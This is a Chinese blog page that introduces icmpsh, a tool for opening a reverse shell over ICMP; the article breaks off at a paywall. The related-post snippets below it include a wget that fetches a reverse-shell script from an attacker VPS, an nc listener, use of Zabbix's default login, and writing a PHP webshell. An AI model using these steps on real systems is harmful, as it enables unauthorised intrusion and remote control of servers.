zabbix 测试shell_利用icmp协议反弹shell

最新推荐文章于 2023-08-18 15:49:41 发布
最新推荐文章于 2023-08-18 15:49:41 发布
阅读量545 收藏
点赞数
文章标签: zabbix 测试shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39636718/article/details/112535859
版权
本文介绍了如何在面对严格出口访问控制的网络环境中,通过ICMP协议实现reverse shell。重点工具是icmpsh,一个跨平台的reverse ICMP shell,无需管理员权限即可在目标机器上运行。详细步骤包括在Kali Linux关闭ICMP回显,运行Python脚本,并在Windows靶机上执行命令,最终成功在Kali上接收反弹的shell。请注意,技术分享仅限合法用途。
摘要由CSDN通过智能技术生成

30aae96094e837643a2ed94c2bb6e366.gif

介绍

有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。

当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。

然而有关UDP,通常是一个DNS隧道或通过ICMP的渠道来获得一个reverse shell。而ICMP就是这个工具的重点。icmpsh是一个简单的 reverse ICMP shell,它分别用C(icmpsh-m.c)、Perl(icmpsh-m.pl)、Python(icmpsh_m.py)使win32.slave兼容原始POSIX。

它比其他类似的开源工具的主要优点是,它并不需要管理员权限就能运行到目标机器上。该工具简洁,方便和便于携带(跨平台)。

此脚本主要是针对windows的,他是一个C/S架构:slave(客户端)它是用C写的只能在windows上运行,master(服务器)是跨平台的,作者将C和Perl已经移植到Python上了。

利用

下载:

https://github.com/inquisb/icmpsh

<
最低0.47元/天 解锁文章
weixin_39636718
关注
【漏洞复现】Zabbix弱口令再到命令执行Getshell
cjstang的博客
06-29 2999
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
Zabbix配置文件详解
you_ranxi的博客
10-31 1809
zabbix配置文件详解 一、配置文件类型 zabbix_server配置文件:zabbix_server.conf zabbix_proxy配置文件:zabbix_proxy.conf zabbix-agentd配置文件:zabbix_agentd.conf 二、配置文件详解 zabbix_server.conf # This is a configuration file for Zab...
Zabbix-ICMP-Ping.xml
12-03
zabbix简单检测icmp模板Zabbix-ICMP-Ping.xml
Zabbix sql注入漏洞脚本执行反弹shell
weixin_30919429的博客
05-18 850
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+--------------------...
反弹Shell
a226433955的博客
07-31 194
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。今天再告诉大家几种方法 环境说明: check1:192.168.233.10 C6 2.6.32-696.30.1.el6.x86_64 本地 check2:192.168.233....
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
梦里明明有六趣,觉后空空无大千
05-19 2083
如果你坚持了自己的梦想,全世界都会为你让路。
zabbix
03-26
熟悉Shell编程对于有效利用Zabbix非常重要。 在提供的"zabbix-master"压缩包文件中,可能包含了Zabbix的主配置文件、模板、用户脚本、监控项定义等核心组件。解压后,通常需要根据具体环境进行配置,并通过Zabbix...
Zabbix报警机制
Ongwu Keep going
08-15 919
*在上次实验的基础上继续实验*
zabbix报错排错大全3
08-14 6274
zabbix报错排错大全 zabbix报错 https://www.cnblogs.com/losbyday/category/876878.html作者总结的很全棒 1.在启动zabbix-agent时系统日志输出 PIDfile/run/zabbix/zabb...
zabbix 5.0所有依赖包_最详细的 Zabbix 使用教程
weixin_39606048的博客
10-22 1989
作者:惨绿少年来源:https://www.cnblogs.com/clsn/p/7885990.html目录[-]一、监控概述二、安装Zabbix三、Web界面操作四、自定义监控与监控报警五、监控全网服务器六、自动发现与自动注册七、分布式监控与SNMP监控 一、监控概述1.1 为什么要监控在需要的时刻,提前提醒我们服务器出问题了当出问题之后,可以找到问题的根源网站/服务器 的可...
一次zabbix的渗透
weixin_30236595的博客
04-14 226
wget http://xxxxxxx:8888/back.py -O /tmp/1.py 写入python反弹反弹到vps python /tmp/back.py IP port 执行python反弹马 仪表盘执行命令 vps上监听nc -l -vv -p8080得交互shell 之后慢慢玩 转载于:https://www.cnblogs.com/ll...
Zabbix实现简单的ICMP ping探活监测
08-18 3950
选中主机,点监控项,右上角[创建监控项],类型选择 [简单检查],键值选择第一个icmpping[,,,,],这里我们把中括号里的一串改成我们要监测的IP地址,点添加。在表达式里,点后边的[添加],选择刚才我们建的监控项,点添加;最后点[应用],点上面的主机,回到主机,点更新。这时一个主机就建好了,可以在监控里看到了,也可以在拓朴图里,在对应的位置,选择我们刚才建的主机,就能直观地看到它的位置啦!
Zabbix使用外部命令fping处理ICMP ping的请求
weixin_30732487的博客
04-13 391
Zabbix使用外部命令fping处理ICMP ping的请求,fping不包含在zabbix的发行版本中,需要额外去下载安装fping程序, 安装完毕之后需要在zabinx_server.conf中的参数FpingLocation配置fping安装的路径。 由于fping默认是root权限工作,而zabbix-server是zabbix用户运行的,所以需要对fping程序设置set...
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 771
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 363
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道‍ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
反弹shell监控
ai749499的博客
01-13 429
转自:http://pirogue.org/2017/07/25/reverse-shell/ 一、跟踪系统调用 1. strace bash test.sh root@Kali:~/pirogue/reverse_shell# strace bash test.sh execve("/bin/bash", ["bash", "test.sh"], [/* 50 v...
zabbixshell步骤
你干啥呢
05-08 6702
测试版本Zabbix 2.2.3 1. 默认用户名密码登录 Admin / zabbix 2.进入后点击管理-脚本 点右边创建脚本或修改已有脚本 写入php一句话 然后点击检测中-最新数据 点击主机选择你刚才创建的命令 点击即可执行 最后在用菜刀连~
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 813
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
zabbix SQL注入漏洞 (CVE-2016-10134)
SoulCat
01-26 7191
zabbix SQL注入漏洞(CVE-2016-10134) 漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
/etc/zabbix/zabbix_agentd.conf
最新发布
01-20
/etc/zabbix/zabbix_agentd.conf是Zabbix Agent的配置文件路径。你可以使用vim命令来修改该文件中的参数。 以下是使用vim命令修改/etc/zabbix/zabbix_agentd.conf文件中的参数的步骤: 1. 打开终端。 2. 输入以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值